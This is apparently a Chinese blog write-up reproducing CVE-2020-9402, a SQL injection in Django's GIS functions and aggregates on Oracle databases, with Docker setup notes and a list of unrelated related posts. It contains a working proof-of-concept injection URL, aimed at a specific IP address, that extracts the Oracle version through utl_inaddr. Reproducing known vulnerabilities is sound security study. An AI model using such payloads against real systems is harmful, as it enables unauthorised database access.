Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)

漏洞描述

Django 于2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。

参考链接:

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

漏洞环境及利用

搭建docker环境

这里遇到一个问题,这个占用空间比较大卡住了,后来查看docker日志才发现

漏洞利用POC

http://139.196.87.102:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

漏洞利用如下

相关推荐
Mephisto.java5 小时前
【大数据学习 | HBASE高级】storeFile文件的合并
大数据·sql·oracle·json·hbase·database
不二人生5 小时前
SQL面试题——连续出现次数
hive·sql·面试
qtvb19876 小时前
sqlite更新
数据库·sqlite
在下方方8 小时前
【快捷入门笔记】mysql基本操作大全-SQL表
笔记·sql·mysql
Ttang238 小时前
数据库&SQL——嵌套子查询(IN/NOT IN/SOME/ALL/EXIST/NOT EXIST)
数据库·sql
计算机学姐8 小时前
基于Python的药房管理系统
开发语言·vue.js·后端·python·mysql·pycharm·django
huanglianggu9 小时前
pip install django-ckeditor -i https://pypi.doubanio.com/simple/
django·sqlite·pip
Denny辉10 小时前
Flink使用SQL Gateway提交SQL Job到远程集群
sql·flink·gateway
聪明的墨菲特i12 小时前
Django博客网站上线前准备事项
数据库·python·django
大油头儿12 小时前
Django处理前端请求的流程梳理
django